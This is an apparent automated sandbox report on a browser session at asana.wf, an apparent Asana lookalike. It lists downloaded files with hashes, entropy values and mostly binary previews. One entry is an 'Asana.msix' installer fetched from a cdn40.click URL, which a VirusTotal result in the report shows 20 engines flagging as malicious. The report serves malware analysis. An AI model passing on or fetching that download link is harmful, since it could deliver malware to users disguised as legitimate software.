                                                                                                                                                                                                                    Preview:...........]...6.....Z.x.....i..d.R.$W.w.js...HbL.*....F..}...R.x...={.G.h.....HgW0.(.8,;..`..e....].w....~....{ ....7....k..{..h..>....hn.6.s.{~..s..rs2..f......Xv.9...S....;.[."a......y...\...[....T..}...A..W..K..MX.*.v..../.<.%..y....1.....b.........V.y.-.....E.4;./..r.e....-..}....p..F,.r.dV...UR...K..%...%^).....s..H..2c..9yc=}jf.I.........h...`Y.....Y..S..O.fO..QFl..L.R..#g....0..`w%K....q.m...0K.0v!q.:.;p.t].b.e..p.m..v...^W$.....1...\...il.-.....h).v.L<......b,f...u.I,3..7./..x..7...)J.Rc.o.A..C.h<+..|n<.....+Tz..io_.n.a..j......m=.).].$qQ:.<.m.>.....pcp..P...-...b.h.?.z.P./N.;..xC..JV.h<~.u?D.C..D.qBL(.Z..w.6.7~...y.0....2K;._.$...1=7h..?I...e..>u.4....Gq...p...h.)J_.2....wP.c..].$..?..a..f...g?.Y.#...u:C...G;s.r......-.%.~..2....v."0.FV.n.~.....X.G...2.T..-.}....K4.3....6..'"....j..O..dt.:O.... .VMd.)~.bV.P..N....qJ?pB?........=.......9......4.t<..-;..a..@.u.........t...f\K......Pq<.e&..D..(.;.w....7....K{U....*.#..;......pG
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):301
                                                                                                                                                                                                                    Entropy (8bit):4.874683396459361
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:+WFibDRd7QMJlC+bDRd7oME3zRo3eL5LK07ORnsObDRd7oMc5LKsA3:+w8DRRQMJlCIDRRovoE5HAs4DRRod5NQ
                                                                                                                                                                                                                    MD5:ED775D8BD4BCF8BFCB5B685BF6043DB5
                                                                                                                                                                                                                    SHA1:AC996D2B7F650DA35CF6F59D2AB3634C19D9DB7D
                                                                                                                                                                                                                    SHA-256:027AE45ABDF7D754956500A07B062EE9DEF6917F029590317BF12889FAD644B6
                                                                                                                                                                                                                    SHA-512:C838E637FDDC1331242A4517BCC0A03EB9AD1F1394F91CB313756DCB0526BC4701526C066335D63DADECFCE38C49C4AAE9A06339E66DA9745AC611DC0E79F0E6
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/pop-up.js
                                                                                                                                                                                                                    Preview:let closed = document.getElementById('popUpClosed');..let popUp = document.getElementById('pop-up');......closed.addEventListener('click', function() {.. popUp.style.display = 'none';..});....// setTimeout(function() {..// document.getElementById('pop-up').style.display = 'none';..// }, 5000);
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):2228
                                                                                                                                                                                                                    Entropy (8bit):7.82817506159911
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                                                                                                                                                                    MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                                                                                                                    SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                                                                                                                    SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                                                                                                                    SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):25625
                                                                                                                                                                                                                    Entropy (8bit):3.574039858057337
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:25JHAIlXL088l4PLfovUEITx8ht/hxbxsyQQtk5Orf0/QGNhqdTZKv/tCyzb:Cmury4PDoMEgx8HrNsyh0xNEev/tCyzb
                                                                                                                                                                                                                    MD5:52E24B397D5086330B46DB97B6F0B063
                                                                                                                                                                                                                    SHA1:47AA178852E12DBEF5B002178F3F0E729437E307
                                                                                                                                                                                                                    SHA-256:E95D438E4121D80F18DE68EE720B013AB770BA7F33D12B019632BA4096C3584D
                                                                                                                                                                                                                    SHA-512:4B38B63BC421D0902D578FFB3D9D90DDB023E2EA2F67D8290F1E566CBFD1E14E5815FB99782CFD7E8B087AB322269EF86A5D1CC97B07A4B6430806C01C815932
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg==
                                                                                                                                                                                                                    Preview:{. "data": {. "id": "MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg==",. "type": "analysis",. "links": {. "self": "https://www.virustotal.com/ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg==",. "item": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358". },. "attributes": {. "date": 1714074936,. "stats": {. "malicious": 20,. "suspicious": 0,. "undetected": 45,. "harmless": 0,. "timeout": 0,. "confirmed-timeout": 0,. "failure": 2,. "type-unsupported": 8. },. "status": "completed",. "results": {. "Elastic": {. "method": "blacklist",. "engine_name": "Elastic",. "engine_version": "4.0.142",.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 66947
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):28158
                                                                                                                                                                                                                    Entropy (8bit):7.989178594314289
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:Hwvtp6V+cO0ZzMRHMuYuyfsyh9ZTUdEbS/BGxck5I92zJN:QcO0eRHbpgsynhDMBmckm929N
                                                                                                                                                                                                                    MD5:322EC754F369B14AA8898467033C49A4
                                                                                                                                                                                                                    SHA1:C6D01AD92E6E8A7E4A61A656F2BC931F1A5994CB
                                                                                                                                                                                                                    SHA-256:A20310738269AB7907AF99CF6ABAAF81A876FD59DD36D9CCBD8FDBD4407489DF
                                                                                                                                                                                                                    SHA-512:6B2F26BA17A1A9172ACACF71D8B69743F866579DA7DDE85789B2984E5D618C57D872FABD41F487B217C2D4B10409853FA2A03E3B77C9CDFD4EBB2AD313631B0B
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/sha256.worker.d774f311f4702f912904.worker.js
                                                                                                                                                                                                                    Preview:............V.I......P.X..4..J..Y.1..t..`wU7..2.P.$Z..q..~..b.......|.....Tfd.y.3bF.......im..o%......|4....0.6..hu.<|w>..gy}.O.4nD.z.e..M..WO.:........(..........7...4.ropz<....n4.?3.3.?...D...S.s....g....G.i.M...<^.>H..a....w..$..8|. Y.?{i.....<.F4.........H..'.?-......?..Co/m......h.3......n>../.9..}.\.FW......7..^..e.8..;_...cF...m4.7...H:....i....:....].u..V..>Pu.]..L.#.U....(...w....F4..>./..;.......n4.c6...nce.....z.&}...Q..Q..".n.Q'.@}.v.v..]....|.7.........p6..l.x?:..3?....[........|3.z1.M...7y^.m./9..Y6-.....L.g.z.....p.}..d....a.i..h&....t..dxxq:.........6.=..8..j..R?..q?..w...?t.....li.G...f.Fs.+.,.M.&.N....[.v...e.9y.w.:i.K]E'{......ulP0G./...{'...I..O}4....:..f......H6.G......3...OgCw}?.]...........<..d.h.......Q..w.o8L.....ab....p|0.:..:)....x..u8Y/..6.E.h.....$.7>D....t.....?......|.}r.E.EG.it..F...u.......)..0.h...q4.,J.8........N,=.F..#..T.RiV7.~1..<...d.....(,.\...{.#8..jo.s*.e,.73*]...fSJpd..x^S.......]..
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 116978
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):35677
                                                                                                                                                                                                                    Entropy (8bit):7.992487621651312
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:768:iP33nfl9Qk+ajsMKdh0OKEr8VVXZqpccLaonQWLZzMw41pW8MB/F/:iP33f3joWOKRlZ6JQWZMRQ
                                                                                                                                                                                                                    MD5:4289D0A4A3E569192A30E34C94B2A1A7
                                                                                                                                                                                                                    SHA1:E7A967F3776E8228D1A54E47F243169FB5DED677
                                                                                                                                                                                                                    SHA-256:FA50047E93DF37D3CFFC656692825BE945BC1D405118FE29ABF0F5DFC53B32D4
                                                                                                                                                                                                                    SHA-512:25D714E9C63140CB91376E561C70A9E84ABC4CBAB18A3B21D5AA9E8F212E805D1E308A522E49945E51DDAB5054C3966DD3E0B4F03FA39A5F4B5A1D4D2F02D57D
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/service-worker.js
                                                                                                                                                                                                                    Preview:.............#...U...m.c... M..<..<.l.N..:.HH ....M......U8H...-yfW..D......8.x"r4::...p.0..e7..........y~b...o.f.<|.v......LQ..qg.W.|aN.7...}.....*.........(z.6m....(~.B..j...i;...y.<t.Ug......\...]...+.x..$.p.].Z...I..sY.bi..y..xyvs{.....|....z.g....f..........3.U7?h'.g.-.v...g7..NX.....[........h..vd.e>b..N+.b...#.a......6m7.1...|ui...df...qw67o.>..z4...1?.O..q{........Q..=...\...v._...#.....g.yprr....}..........fFn..h..=.f.bq.(...^.|.umwcG..%.\.7...F.~..b2/.....\.e1.-...3s........k.X.~<k.....3....3W..2#..W....W.....Y..........t>bK2.v...@...l..z..............X...g..s?..|.~.M'........7.'.:..3oX.......j2.W.Um...G.4..}.|i.....T....z1r...r4Y..f.?Z.orn.....Y..../.....oo..<.....w.v<..G7..D@y..oG..:[L^.....~O....I....::.c.^N...^..._M....8n.v....d{.....J./...OW5.~...W.x~6..._....D.V^....Ze..6.~....j6....3....\..ps...}G..U.....S\]....&...f:*./...p.F<.3..M..{.Y^t....E..n..g..p.\..|x<;w......h..{sc.P.=....et.N.,:...z}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 560x373, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):12748
                                                                                                                                                                                                                    Entropy (8bit):7.986011639595796
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:l4QLACoKydVf5YcYqZPSny2spQPDMBIyW+Y:iQkDXXizqdSny2WQPD6IP+Y
                                                                                                                                                                                                                    MD5:CA587E6941A7DC2AD2ACE22A24F087E7
                                                                                                                                                                                                                    SHA1:78032F04642511137CF7039A37720B66C09D4AAA
                                                                                                                                                                                                                    SHA-256:919A938C1410D567FB4885520C2E9169269631ED7484780974AEE322D55612A1
                                                                                                                                                                                                                    SHA-512:F46D3DB95244EA63A986CB5B0CF7E64FBB18EE63BE595F51F24F456AB30AC80A5E3363962A82B535F51D3E400742AE0CD460951DF14EA77C707DB94FE937F0CB
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:RIFF.1..WEBPVP8 .1.......*0.u.>.B.K%..'...P...en.|4.m..f....i.09..........M....L...'Me._.....{.~..1.....R.../.|..._....&._.........;|A..y........}........*../?u}.J;....(.F.6Q..gQ...l..MQ} u.....9H.V.m.qO...r..."D]..Q..j..BN....Ccnt.r;.A.7...q0.6.!.....>..<i/y.AB..P......s...d.._*.9.\.......c*.qm..Yb~<[...y..+p....`. ~..G.(........:.....J.......W%7...f.....%.!.r.)\..=W../.......*1.G1U.\I...E.L......Ko.^.P2..;F.........i.Q...j}[70........+.|..GG...a..9.rv:....C\4.L..2.e...9.'........x.jQ..>...>(.;G..o^...a......oX..).eygX2...@...#.....An.k..#.P../O..!O..).....p...=........Z......ka7c.6WZ..N+....s......(Q.....c.G(C.pEq...b....^....H....xL"~.C..>U.KEm..*+P...)..b...D..8.$....x..!.A.V.....2.Z..4.w.......V...5...........~h.f..S.".[..<?.T.R.....p.1...[.% ....n5.....Mif.)a....s</SZ.o.x..P....aw..1.. ...J...A.!._.>=R...-.a......d.$...W...NV......../.snx....`j....]d...g..\,..mf...H..\....1.,.t........w.w4.+.......S.d`.."..O..i..Yj...F.v..fP..."...]
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 21995
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):7357
                                                                                                                                                                                                                    Entropy (8bit):7.973524038328246
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:59EK09fVMFNIlkEfaOxQrNgT2sRGDcTyur5/mTgg4bWX029PjM85KqsZsPHIqvln:YfVAN/OOr+4iyUmTgSEIjx5JoFO6EVt
                                                                                                                                                                                                                    MD5:ADBC6A917F2C4DEDAD72573D6370DDC1
                                                                                                                                                                                                                    SHA1:0F4813102FA87BB3221C0A3F3E71D9216B406589
                                                                                                                                                                                                                    SHA-256:E72B8AFFC02290B9F5124881675334E5752C5E46D0499096A0C56F49396219DE
                                                                                                                                                                                                                    SHA-512:775C550A88AD93DEE8F4869AB32A864A43F22BC9CED72D096E9B3615EFCC6C4A43DFF3C824596561D85B0E63DF8B78B44CB669B3B597F3616882D7F0C0782E51
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/50361.77111c62cbde58b54cb1.js
                                                                                                                                                                                                                    Preview:...........\yw.F...?..$.".@<.S..Y.....$.%q...h..@..@.....W}.....M2.}o.D"........Rf.Y.xY..p.\.....N...2........G.no.7..*....4....w..Vspp.z....j..........u..o5...bV`...nb........J.c...V...~.q`..,3R..Q6:..i.7.."/..H.e.&_+.<7...,.R'd.,.[.(z.~..*.G.Q.(.........U.&..,.n...K.e.'u.o....z-.Ck.Qv.d..8e..s..j...>.g^...3...7.....4.b3:.;.$.v..=.5.].6..({.7....N.H.9....`..E.k...a.U.....K...)}6.".N).Y.#..y......X.F....!#..........,7!K..Z.QoX..YOoo.\..p......e....(.._Ms.`]..3.l...8H.../.Y.7,.7.._z.-B..bm.k......./..i<.._.5-....,N.n.a...V.w.R.12.6r..4....h... ..ud..N......Gif..6W.........kp~"..fs...ah.,%..5q......6.{..,.V....Y.q.........*..$.Y.]f.*.......:.N...[..]L+p|......$.......0.:..t..oL.u$..n.s@+.z...+3?..!+....[."..{oXDc6V..{..<...U......$....O....X.f....t5....'7|n>S`c....q......@Jop7.WI..e..Z..........Z5...l.:..4....\i.z....R..P..Ru.....I!.r..M..aV..o.h.W..AP.x...G.5..A.....J<`Zs|..3..>rt..%..>LkA..n..o.q...q......O..m...m..2M....F......lw.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:MS Windows icon resource - 1 icon, 100x100, 32 bits/pixel
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):41662
                                                                                                                                                                                                                    Entropy (8bit):1.662572295735079
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:3chBFpWObQy//Pn9g15HdJSSoG29mggggggggg5/:+FYObB/Xn9g15H/SSR2N
                                                                                                                                                                                                                    MD5:03789A9CAF871A2C491FCF788FB9519D
                                                                                                                                                                                                                    SHA1:7CA722C5AC96374284EFC40DB654DE76B4F1C7EF
                                                                                                                                                                                                                    SHA-256:A42AE227F92CC034BED8015AF2BB5664327C3EF4C207E3DC6CD06E8642845E77
                                                                                                                                                                                                                    SHA-512:AA6E83B00DB93D851B6A06F6192F1A95138071B61360CC31C03ECF36623C0915FF63D819EE2B802EEA3184B04A8E413E823FC1B22D5637B5AAB4636CFEDD6E1A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/assets/img/brand/asana-logo-favicon.ico
                                                                                                                                                                                                                    Preview:......dd.... .........(...d......... .....@...#...#.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):1063870
                                                                                                                                                                                                                    Entropy (8bit):7.997687111294189
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:24576:4tnGpZCIOG9vMcvFkySgnoQce6Xhdi+J72iRgnzY:4MpktG99vFkypKeih8+J71Wc
                                                                                                                                                                                                                    MD5:282DA020798AFBD7EFF40CE854E8D01F
                                                                                                                                                                                                                    SHA1:29962DAA2D76871C4F2E7609A83984ECD431D44C
                                                                                                                                                                                                                    SHA-256:76F98321F50595725F64F058D8F33103D518C5D77680FD7D5521C41786299358
                                                                                                                                                                                                                    SHA-512:69E3699B20EE8F7225EBB9426E6230485FC78250DDDCC82A6D96B52B04E4AE0734369AB14DA8C0DD02F76758E55B5C28F91F080F7CC8D036ED8CD43D6157EB84
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://cdn40.click/files/Asana.msix
                                                                                                                                                                                                                    Preview:PK..-......*.X................Registry.dat.}.|..g..1/A.. .......c$...3.I..^h.....3.........d../@...x.!Z.a..D@..G.q..}lvW..6.%d..\V.e.cs....._.5.......F%}..._.............M..*q.t....O/.a.;.z.......<.G.Y.D.3......^XV........e.,k`Y...X.....5...e.,k.......8UV.a.o...qi..........zS]0...c..v.....4.....'...F4...u.=...i...Y..j.)...)..w..B.?.B.W..N.v..?....".4qe..y.................5T?R..J.w....4e5....>..NaZ.........[...S.)....W.U..?1....?{(O..(zGJ.+..3A...o..n....T.Z...G.}}.+zV.H..".........y.6..h.c....S5.....QE./...E...?[..YYA...=m..}}....O.........vTx..h...V....(....>..zE......E.br^V@..g..-......A.O<v.^T..c.'m...,A...(..n.%....d..7..d..e.y..0C{*..~C[._.*.|.........S)#..C....{q.Cw.?s..jO+.}%.}.......%..`.<9...p.}.w..v]W....^*EW.I...o.l..:......v..FB._s..w.e.B9..C."....~3...v..%..6._].......-.m..5..K..1...i.&......).....-.X..D.3yT.....gs....;.6D.jwY.....J.m_......b.x.(......x4`...*(...3..`[....)......%.....km.J.#.....X.dLPt..G..,..,C_gRt...g..g...[.N..n.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):26502
                                                                                                                                                                                                                    Entropy (8bit):7.984063981678213
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:iHbESCYxe4iS0vzoe7CeySKkBvuOmZ/rTsTi:E4S0v8eZySnmZTTs
                                                                                                                                                                                                                    MD5:B34B9328BBF3C7847A31301D96C6787C
                                                                                                                                                                                                                    SHA1:3BEB295BB3EC3C65AF9D2A505F426BE6B8A35853
                                                                                                                                                                                                                    SHA-256:673121687F6BFBAB4A75FEBAC64C6B3D42E6B288960044E5FB9810B1F747BD28
                                                                                                                                                                                                                    SHA-512:A1D737CACCA92257E40F3C45A43DD320A097F204D0DC9C4C1036822882B08B2A0186E80C97347A5250C544F71DEFD4C153F79A22ECC01DB898DC3147F34DD8B0
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:RIFF~g..WEBPVP8X......../../..ALPH......U..6..!\(B..A$.....,.2.....s..;_.cF...KO..1..q..[..t..q.^...8..+.c...h..2....F...yT.\..21z.k..r..iT."..b..F...C.X.b1.o..zT.>.e..........................................................................................................................................................................................................................................}/G..jq.Y-..X..Z...-b*.9E.^).........L...~*......B../]z}.s....6.....Y.2.).=..=.a.>?...VP8 .e...{...*0.0.>.@.L%.&*.0:.P..in.9v*.W.u..*....jNQ.#/`......Ji.w...............k.$=.|..O.?..i|`....}....o].|>E...)..\..k./.........@.....R._`....=f.....e...._......7...o......t.......?.....6Rl.'.....\(p...`.>....B.C..........*...,l..(O..s.P.P.ce&.B}?.....)6....\.T..8X.I.P.O...p....M.....?...8...o..z..o@a~RQ|...,..p.DX..j.".)y6.>.VY.i.5{/w..)m.=...C......A......\.q.....M...@...J..o....J.....k...p....B`.B_.m.}..b...IEB..-&<....`w..#._..D...q...z..J..1.>....<.Q.R.O_......^".Qr1
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 15091
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):2546
                                                                                                                                                                                                                    Entropy (8bit):7.916425819241393
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:XBQTWKg3UpnKXaYp4zbXkBuO58DhcdRHHBdo6QIzh5d2EZVC:R4lOUpnKKkkG8Dh8ZPo5InkoVC
                                                                                                                                                                                                                    MD5:93A6E9E3DCBFB4C33D7360E2FB31CF88
                                                                                                                                                                                                                    SHA1:31EFCDF662490E02A828B0D033A7952618D16FDC
                                                                                                                                                                                                                    SHA-256:BE02A9DE6C04C9E385BA91240D67EEA3362DC9BB4DDDD2265E12EB6C2FE425C4
                                                                                                                                                                                                                    SHA-512:C5080E8F200586E50F167F69BC1ABC2F87457A333C84FA89577AFF62155247C949863CE06A4869FCD3247249E4D7F6F50F7B0C29B6A3BBF4A1F200B8C310DF82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/6829.6c727ee07d052c60889f.js
                                                                                                                                                                                                                    Preview:...........[ko....._A.h@6.W../..7p."@....k..E......e......>.....5H.D"G3....{.'.h\0...mp..........A.}..NB;.K#.wwwW.=L.....?l.][..Fs.M......0.7.5._.......L..3..........#........x...p.\|.?<8..@>=.o6M...7..C.J.i....4.$...#...y.sN...O.....l..=..qz...xH.._..n...W4...5r...A.j.h .3..l..2"..iK.yO...P.L.h.(..s.....i1.N......,jN...4?A...I..H|..m.....m"..D}1h..s.Q..;N..\.W..&.6.[....b0..i.6...z.Yd.T..........l.Oz4"..)....~.2.V....-;`..|..0...D.`Q28C..B;..A..+...G..$.A.r.(aN.[z..M...h..nG....R..T.l..1.RAG.Z..(....q..+".=7...ww:..&.../.E.ch[.X|.E.F.........V9N......W..dh#7H...1t.&.>P;..B}n}M..a&.q...W..1m..n.H.K......3Z.A.......Q...e.....BZ.>O...9..S/p9.B......0.Vbw.fEUa ..0.B.3.x...U.....n.&v..Md...x..c..a\..s.......z.3....p....z0m.[.c2M5.2...4R.w.0...(....9....a.vA.i...".....]...w..j.............U7.m..5/...AI.v3 .h..Z.L. ......h.*C)5.Y.sZZMO..|..Y..G*.X.`..._.\:p.V..z..o..26+..%.S...11.....RNlFx...#[.Hd...<xT....|.#QZ..B.0.l......#2',.X.Yd...X..k....L.....Q
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 21624
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):8176
                                                                                                                                                                                                                    Entropy (8bit):7.975262085556402
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:Z/E1rgPhB/S7d7jk2FblqV4meSk8BpD4U6:VHRod7g2BkVqH8BJY
                                                                                                                                                                                                                    MD5:1DF317084F7C243C5B14DBA2BACDE5C9
                                                                                                                                                                                                                    SHA1:A3CC90F097C04BFA65E9974C7716337B2CAC2E44
                                                                                                                                                                                                                    SHA-256:D821A47BB59F24A905EE2E1B0A0D94995B5880D9546ECBE6B3C1F6F7C91AC551
                                                                                                                                                                                                                    SHA-512:8870917966AD4B022F80E41D7A40D1536C4980D3CC81191E123CF26432B023C0B95CEE77098E67997FF6EE9EFB1CF7DFF7EBAD2A84B9695F91C1930556D69EED
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/65524.4523ddf7cb1bdb5a39f0.js
                                                                                                                                                                                                                    Preview:...........\is.F......d.".@...'.Lv\.$Sv.....dSD..,.....}....ARN..+..>.....+....m....j...o?....L?........5..wq...{k.?'..bVmN_.G...M[..vtU...K...6.i=N.4.L...n.D.U.k.yq`Z...^...v6..fh....Lk..f..@[.GajZs...B...,.....oZ;j.2._W..z>f..-........ .4...1...i^..5...`=Zw...uc.j.f.l}m}k}o...Z.X....e.q.j..m.mQm.A...........m..)..]...E..M6...N...|...W6o.[.~...O]mY.>}.y]l....'.U...*>t4..O[V-.7lYb...H.p..,....T..:x.X......^N[...]./..Ui...............T/..`........yU.vWo.._\......[..........z:/.1.c.6..X;o..j.......:c.q:.V.*..i..{/....."o...7E...~....%k..@s....Cv.....c.......[s|..l..].....[.bv..3...v.]]..?.F...U.0\p..._'..ty.ZG,z.qX.............f7[.-...7..=....Ah..xs.xn[4.....P....N..j.m..A..2..X....:..Y.<.H2.........%3../..9Cj.d..5....@.a2.|..._......p......V.'..u3..&...M..q......S....c.....=.O.YT..z%..u............./o..a/~...].,oo s.<..5...Y...`.>..|s7....|]...B....#.A..+...<.x...`<F..P...'...-...o<.a1..}b.)a..x......Y).D..l:..'....:.^..
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2508)
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):486733
                                                                                                                                                                                                                    Entropy (8bit):4.094057275528013
                                                                                                                                                                                                                    Encrypted:false
